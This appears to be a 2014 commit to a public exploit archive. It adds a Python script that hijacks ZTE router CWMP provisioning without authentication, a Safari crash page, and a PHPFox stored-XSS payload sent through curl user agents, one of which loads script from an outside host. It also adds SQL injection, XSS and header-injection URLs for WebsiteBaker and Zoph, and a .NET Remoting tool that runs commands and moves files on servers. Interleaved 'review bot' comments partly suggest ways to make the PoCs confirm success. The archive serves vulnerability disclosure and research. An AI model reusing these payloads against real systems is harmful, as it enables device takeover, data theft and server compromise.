Updated 11_19_2014

Offensive Security 2014-11-19 04:49:39 +00:00
parent 892f0c3055
commit a28bed7356
8 changed files with 682 additions and 0 deletions


@ -31767,3 +31767,10 @@ id,file,description,date,author,platform,type,port
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80
35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0
35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
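Review bot: entries 35272 and 35276 index the same advisory twice (identical title "ZTE ZXHN H108L - Authentication Bypass", identical date 2014-11-17, identical author "Project Zero Labs", identical hardware/webapps classification), differing only in the port column (0 versus 80); one of the two IDs should be dropped or the titles differentiated, otherwise the same bypass appears as two exploits in every search. The port column is also applied inconsistently inside this hunk: 35265, 35266 and 35272 carry 0 while 35274 to 35278 carry 80 for equally HTTP-based targets; pick one convention (0 for "not applicable" or the real service port) and use it for all rows.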



@ -0,0 +1,71 @@
About the software
==================
ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers.
Vulnerability Details
=====================
CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication.
Affected Products
=================
Device model : ZTE ZXHN H108L
Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4
Proof of Concept
================
#!/usr/bin/python
import requests
acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"
# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,
# router will connect back to the ACS server.
conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"
#Periodic inform parameters
active = 1
interval = 2000
payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }
r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload)
Impact
======
The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page.
Severity
========
Medium
References
==========
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/
Disclosure Timeline
===================
27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response states that ISP should be contacted
03/11/2014 - Second attempt to contact the ISP.
14/11/2014 - No response from ISP. Public Disclosure
Contact Information
===================
Domain: https://projectzero.gr
Social: twitter.com/projectzerolabs
Contact: labs _at_ projectzero.gr
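Review bot: the proof of concept posts the new CWMP settings but never inspects the result, so a reader cannot tell an accepted change from a rejected one; after the `requests.post(...)` line print `r.status_code` and the start of `r.text`, and state in Vulnerability Details what the router returns when the change is accepted. The form values are also mixed in type: `active` and `interval` are integers while every other field is a string; requests stringifies them, but writing `'1'` and `'2000'` shows what is actually sent. In the Disclosure Timeline the second ISP contact (03/11/2014) is listed after the ZTE response of 04/11/2014, so either a date or the order is wrong. Finally, the "Medium" severity does not match the advisory's own Impact text: the request replaces the ACS URL and credentials with attacker-chosen ones, CWMP is described here as the ISP's remote provisioning channel, so whoever runs the new ACS controls the subscriber's CPE configuration, and the missing CSRF protection means any web page the subscriber visits can send the POST to 192.168.1.254; that combination reads as high, not medium.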

platforms/osx/dos/35279.html Executable file

@ -0,0 +1,127 @@
@w3bd3vil
<!DOCTYPE html>
<head>
<style>
svg {
padding-top: 1337%;
box-sizing: border-box;
}
</style>
</head>
<body>
<svg viewBox="0 0 500 500" width="500" height="500">
<polyline points="1 1,2 2"></polyline>
</svg>
</body>
</html>
<!--
Safari 8.0 / OSX 10.10
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8ab10282: jae 0x7fff8ab1028c ; __pthread_kill + 20
0x7fff8ab10284: movq %rax, %rdi
0x7fff8ab10287: jmp 0x7fff8ab0bca3 ; cerror_nocancel
0x7fff8ab1028c: retq
(lldb) register read
General Purpose Registers:
rax = 0x0000000000000000
rbx = 0x0000000000000006
rcx = 0x00007fff5b761d98
rdx = 0x0000000000000000
rdi = 0x000000000000140f
rsi = 0x0000000000000006
rbp = 0x00007fff5b761dc0
rsp = 0x00007fff5b761d98
r8 = 0x0000000000000000
r9 = 0x00000000000000a8
r10 = 0x0000000008000000
r11 = 0x0000000000000206
r12 = 0x00007fff84b36487 "transform_is_valid(m)"
r13 = 0x0000000108c2c000
r14 = 0x00007fff747ae300 libsystem_pthread.dylib`_thread
r15 = 0x00007fff84b36477 "Paths/CGPath.cc"
rip = 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
rflags = 0x0000000000000206
cs = 0x0000000000000007
fs = 0x0000000000000000
gs = 0x0000000000000000
(lldb) bt
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90
frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129
frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321
frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242
frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93
frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
frame #8: 0x00007fff8f47a2fa WebCore`WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
frame #9: 0x00007fff8f47a633 WebCore`WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
frame #10: 0x00007fff8eab4aeb WebCore`WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
frame #11: 0x00007fff8eab477d WebCore`WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1325
frame #12: 0x00007fff8ea2c3f2 WebCore`WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
frame #13: 0x00007fff8ef300a8 WebCore`WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
frame #14: 0x00007fff8e9b1e83 WebCore`WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
frame #15: 0x00007fff8e9b1929 WebCore`WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
frame #16: 0x00007fff8e9613c6 WebCore`WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
frame #17: 0x00007fff8e95e9a3 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
frame #18: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #19: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #20: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
frame #21: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
frame #22: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
frame #23: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #24: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #25: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
frame #26: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
frame #27: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
frame #28: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #29: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #30: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
frame #31: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
frame #32: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
frame #33: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
frame #34: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
frame #35: 0x00007fff8e95e8e2 WebCore`WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
frame #36: 0x00007fff8e95e5b7 WebCore`WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
frame #37: 0x00007fff8e95d252 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2386
frame #38: 0x00007fff8e95c6e2 WebCore`WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
frame #39: 0x00007fff8e95d392 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2706
frame #40: 0x00007fff8e988376 WebCore`WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
frame #41: 0x00007fff8f432baf WebCore`WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
frame #42: 0x00007fff8ee86924 WebCore`WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
frame #43: 0x00007fff8f3b2f59 WebCore`WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
frame #44: 0x00007fff8f60f367 WebCore`WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
frame #45: 0x00007fff8f6983fc WebCore`-[WebSimpleLayer drawInContext:] + 172
frame #46: 0x00007fff85249355 QuartzCore`CABackingStoreUpdate_ + 3820
frame #47: 0x00007fff85248463 QuartzCore`___ZN2CA5Layer8display_Ev_block_invoke + 59
frame #48: 0x00007fff8524841f QuartzCore`x_blame_allocations + 81
frame #49: 0x00007fff85247f1c QuartzCore`CA::Layer::display_() + 1546
frame #50: 0x00007fff8f69831b WebCore`-[WebSimpleLayer display] + 43
frame #51: 0x00007fff85247641 QuartzCore`CA::Layer::display_if_needed(CA::Transaction*) + 603
frame #52: 0x00007fff85246d7d QuartzCore`CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
frame #53: 0x00007fff8524650e QuartzCore`CA::Context::commit_transaction(CA::Transaction*) + 242
frame #54: 0x00007fff85246164 QuartzCore`CA::Transaction::commit() + 390
frame #55: 0x00007fff85256f55 QuartzCore`CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
frame #56: 0x00007fff867e5d87 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
frame #57: 0x00007fff867e5ce0 CoreFoundation`__CFRunLoopDoObservers + 368
frame #58: 0x00007fff867d7858 CoreFoundation`CFRunLoopRunSpecific + 328
frame #59: 0x00007fff8434943f HIToolbox`RunCurrentEventLoopInMode + 235
frame #60: 0x00007fff843491ba HIToolbox`ReceiveNextEventCommon + 431
frame #61: 0x00007fff84348ffb HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71
frame #62: 0x00007fff90583821 AppKit`_DPSNextEvent + 964
frame #63: 0x00007fff90582fd0 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 194
frame #64: 0x00007fff90576f73 AppKit`-[NSApplication run] + 594
frame #65: 0x00007fff90562424 AppKit`NSApplicationMain + 1832
frame #66: 0x00007fff8d881ef2 libxpc.dylib`_xpc_objc_main + 793
frame #67: 0x00007fff8d883a9d libxpc.dylib`xpc_main + 490
frame #68: 0x000000010449ab40 com.apple.WebKit.WebContent`___lldb_unnamed_function1$$com.apple.WebKit.WebContent + 16
frame #69: 0x00007fff850755c9 libdyld.dylib`start + 1
frame #70: 0x00007fff850755c9 libdyld.dylib`start + 1
(lldb)
-->
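Review bot: the handle `@w3bd3vil` on the first line precedes `<!DOCTYPE html>`, and the file closes with `</html>` without ever opening `<html>`; move the credit into the trailing comment block so the PoC is a well-formed document that every parser loads the same way. The debugger output also deserves a one-line interpretation in the header: r12 and r15 hold the assert expression `transform_is_valid(m)` and the source file `Paths/CGPath.cc`, frames #3 and #4 show `__assert_rtn` reached from `CGPathCreateMutableCopyByTransformingPath` (presumably the 1337% padding-top drives the SVG's transform to a value CoreGraphics rejects), and frame #68 places all of this in `com.apple.WebKit.WebContent`; in other words an assertion abort that kills the tab's content process, not a memory-safety fault. "Crash PoC" should say "assertion failure in the WebContent process, denial of service only" so nobody triages it as exploitable. Frames #69 and #70 are duplicate `libdyld.dylib\`start + 1` lines and one of them can go.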

platforms/php/webapps/35274.txt Executable file

@ -0,0 +1,80 @@
# Exploit Title: PHPFox XSS AdminCP
# Date: 2014-10-22
# Exploit Author: Wesley Henrique Leite aka "spyk2r"
# Vendor Homepage: http://www.moxi9.com
# Version: All version
# CVE : CVE-2014-8469
# Response Vendor: fixed 2014-10-23 (to v4 Beta)
[+] DESCRIPTION
The system stores all urls accessed in a database table, below
information in the same 'phpfox_log_session'
[phpfox]> desc phpfox_log_session;
+---------------+----------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+---------------+----------------------+------+-----+---------+-------+
++++++++++ more values and
| user_agent | varchar(100) | NO | | NULL | |
+---------------+----------------------+------+-----+---------+-------+
the column that can be manipulated is:
-> user_agent (100)
all acess store in the system, such as bots and users wandering around the
web site, can be seen in:
AdminCP
TOOLS > Online > Guests/Boots
Output
| IP ADDRESS | User-Agent | ...
knowing this, the following code was created to inject a script into the
AdminCP with User-Agent.
$ curl -A "<script src='http://www.example.com/script.js'></script>" \
http://www.meusite.com.br/
OR
$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/
when any user with administrative access in.
'AdminCP'
TOOLS > Online > Guests/Boots
we have the script running in the administrative area.
[+] My Solution
(line 1.8)
1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php
Tue Oct 21 10:00:11 2014 -0200
1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php
Tue Oct 21 12:28:39 2014 -0200
1.3 @@ -25,7 +25,7 @@
1.4 {foreach from=$aGuests key=iKey item=aGuest}
1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">
1.6 <td><a href="{url link='admincp.core.ip'
search=$aGuest.ip_address_search}" title="{phrase
var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>
1.7 - <td>{$aGuest.user_agent}</td>
1.8 + <td>{$aGuest.user_agent|strip_tags}</td>
1.9 <td class="t_center">
1.10 <div class="js_item_is_active"{if !$aGuest.ban_id}
style="display:none;"{/if}>
1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0"
class="js_item_active_link" title="{phrase var='admincp.unban'}">{img
theme='misc/bullet_green.png' alt=''}</a>
1.12 @@ -43,4 +43,4 @@
1.13 <div class="extra_info">
1.14 {phrase var='admincp.no_guests_online'}
1.15 </div>
1.16 -{/if}
1.17 \ No newline at end of file
1.18 +{/if}
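Review bot: the proposed fix in line 1.8, `{$aGuest.user_agent|strip_tags}`, strips markup instead of encoding it, which is the wrong control at a template output: it destroys legitimate data, it leaves every other view that renders the same `user_agent` column (for example the per-IP activity page linked in line 1.6) unprotected, and it relies on PHP's tag parser rather than on the HTML context. Encode at output instead, `htmlspecialchars($userAgent, ENT_QUOTES)` in the controller or the template engine's HTML-escape modifier if it has one, so `<`, `>`, `"` and `'` become entities and the stored value stays intact for logging. The write-up should also mention the storage limit visible in the `desc` output: `user_agent` is `varchar(100)`, so anything beyond 100 bytes is truncated on insert; the `<script src='http://www.example.com/script.js'></script>` example fits, a longer URL would not. Minor: "Guests/Boots" in the AdminCP path is "Guests/Bots", and "when any user with administrative access in." is missing its verb ("logs in").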

platforms/php/webapps/35277.txt Executable file

@ -0,0 +1,111 @@
=============================================
MGC ALERT 2014-004
- Original release date: March 11, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in WebsiteBaker 2.8.3
II. BACKGROUND
-------------------------
WebsiteBaker helps you to create the website you want: A free, easy and
secure, flexible and extensible open source content management system (CMS).
III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variable "id" on the page
"modify.php". This bug was found using the portal without authentication.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
Has been detected a reflected XSS vulnerability in WebsiteBaker, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.
An input validation problem exists within WebsiteBaker which allows
injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n)
characters into the server HTTP response header, resulting in a HTTP
Response Splitting Vulnerability.
IV. PROOF OF CONCEPT
-------------------------
SQL Injection:
/wb/admin/pages/modify.php?page_id=1
Cross-Site Scripting GET:
/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1
/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1&section_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
/wb/modules/news/add_post.php?page_id=1&section_id=f953a"><script>alert(1)</script>4ddf3369c1f
/wb/modules/news/modify_group.php?page_id=1&section_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
/wb/modules/news/modify_post.php?page_id=1&section_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
/wb/modules/news/modify_settings.php?page_id=1&section_id=%008b2f4"><script>alert(1)</script>bdc8b3919b5
HTTP RESPONSE SPLITTING:
If you enter a valid user and password, you can inject on the headers
malicious code, example.
POST /wb/admin/login/index.php HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.244.129:80/wb/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar&
url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=adminResponse
You can inject a new header named: InjectedHeader:MaliciousCode because we
inject a CR&LF new line with %0d%0a%20.
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
WebsiteBaker <= 2.8.3
VII. SOLUTION
-------------------------
No news releases
VIII. REFERENCES
-------------------------
http://www.websitebaker.org
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 11, 2014 2: Send to vendor
June 05, 2014 3: Second mail to the verdor without response
November 18, 2014 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
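Review bot: the SQL injection proof of concept `/wb/admin/pages/modify.php?page_id=1` contains no injection payload at all, and section III names the variable `id` while the URL uses `page_id`; as written the finding is not reproducible. Show the probe that was sent (the quote or the boolean pair) and the database error or differential response that confirmed it, and explain what "only is needed use the version 1.0 of the HTTP protocol" means in practice, since nothing in the examples is HTTP/1.0-specific. "10/10 (CVSS Base Score)" has no vector string behind it, and the advisory is unclear about preconditions: section III says the SQL bug was found without authentication, the response-splitting PoC explicitly requires a valid user and password, and every XSS URL sits under `/wb/admin/` or `/wb/modules/` with no statement of whether an admin session is needed. State the access level for each of the three bugs, because a post-auth admin-panel XSS and an unauthenticated SQL injection cannot share one score. For the response-splitting example, name the response header the `url` POST parameter ends up in (a post-login redirect would suggest `Location`) so a reader knows where the injected `InjectedHeader:MaliciousCode` line appears.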

platforms/php/webapps/35278.txt Executable file

@ -0,0 +1,84 @@
=============================================
MGC ALERT 2014-005
- Original release date: March 5, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in Zoph <= 0.9.1
II. BACKGROUND
-------------------------
Zoph (Zoph Organizes Photos) is a web based digital image presentation and
management system. In other words, a photo album. It is built with PHP,
MySQL and Perl.
III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variables "id" and "action" on the
pages group, photos and user. This bug was found using the portal with
authentication. To exploit the vulnerability only is needed use the version
1.0 of the HTTP protocol to interact with the application.
Has been detected a reflected XSS vulnerability in Zoph, that allows the
execution of arbitrary HTML/script code to be executed in the context of
the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
SQL Injection:
/zoph/php/group.php?_action=1'%22&_clear_crumbs=1
/zoph/php/photos.php?location_id=1'%22
/zoph/php/user.php?user_id=&_action=1'%22
Cross-Site Scripting GET:
/zoph/php/edit_photos.php?photographer_id=3"><script>alert(1)</script>
/zoph/php/edit_photos.php?album_id=2&_crumb=3"><script>alert(1)</script>
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Zoph <= 0.9.1
VII. SOLUTION
-------------------------
No news releases
VIII. REFERENCES
-------------------------
http://www.zoph.org/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: Second mail to the verdor without response
November 18, 2014 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
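Review bot: the three SQL injection proofs of concept (`_action=1'%22`, `location_id=1'%22`, `user_id=&_action=1'%22`) are bare quote probes with no evidence attached; add the MySQL error text or the true/false response pair that confirmed each one, otherwise a reader cannot distinguish an injection from an ordinary input-validation error page. The dates disagree with each other: the header gives March 5, 2014 as the original release, the revision history says "March 11, 2014 1: Initial release", and this alert is numbered 2014-005 although 2014-004 (WebsiteBaker) is dated March 11; correct whichever is wrong. Section III says the bugs were found "with authentication", and that should be reflected in the severity: "10/10 (CVSS Base Score)" with no vector string is not credible for findings that need a Zoph login, and the required access level (any user or an administrator) should be stated for both the SQL injection and the reflected XSS.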


@ -0,0 +1,78 @@
Source: https://github.com/tyranid/ExploitRemotingService
Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip
ExploitRemotingService (c) 2014 James Forshaw
=============================================
A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.
It only works on Windows although some aspects _might_ work in Mono on *nix.
Usage Instructions:
===================
ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014
Uri:
The supported URI are as follows:
tcp://host:port/ObjName - TCP connection on host and portname
ipc://channel/ObjName - Named pipe channel
Options:
-s, --secure Enable secure mode
-p, --port=VALUE Specify the local TCP port to listen on
-i, --ipc=VALUE Specify listening pipe name for IPC channel
--user=VALUE Specify username for secure mode
--pass=VALUE Specify password for secure mode
--ver=VALUE Specify version number for remote, 2 or 4
--usecom Use DCOM backchannel instead of .NET remoting
--remname=VALUE Specify the remote object name to register
-v, --verbose Enable verbose debug output
--useser Uses old serialization tricks, only works on
full type filter services
-h, -?, --help
Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd cmdline : Execute a command line process and display stdou
t
put localfile remotefile : Upload a file to the hosting server
get remotefile localfile : Download a file from the hosting server
ls remotedir : List a remote directory
run file [args] : Upload and execute an assembly, calls entry point
user : Print the current username
ver : Print the OS version
This tool supports exploit both TCP remoting services and local IPC services. To test
the exploit you need to know the name of the .NET remoting service and the port it's
listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find
this in the server or client code. Look for things like calls to:
RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance
You can then try the exploit by constructing an appropriate URL. If TCP you can use the
URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.
A simple test is to do:
ExploitRemotingService SERVICEURL ver
If successful it should print the OS version of the hosting .NET remoting service. If
you get an exception it might be fixed with CVE-2014-1806. At this point try the COM
version using:
ExploitRemotingService -usecom SERVICEURL ver
This works best locally but can work remotely if you modify the COM configuration and
disable the firewall you should be able to get it to work. If that still doesn't work
then it might be an up to date server. Instead you can also try the full serialization
version using.
ExploitRemotingService -useser SERVICEURL ls c:\
For this to work the remoting service must be running with full typefilter mode enabled
(which is some, especially IPC services). It also only works with the commands ls, put
and get. But that should be enough to compromise a box.
I've provided an example service to test against.
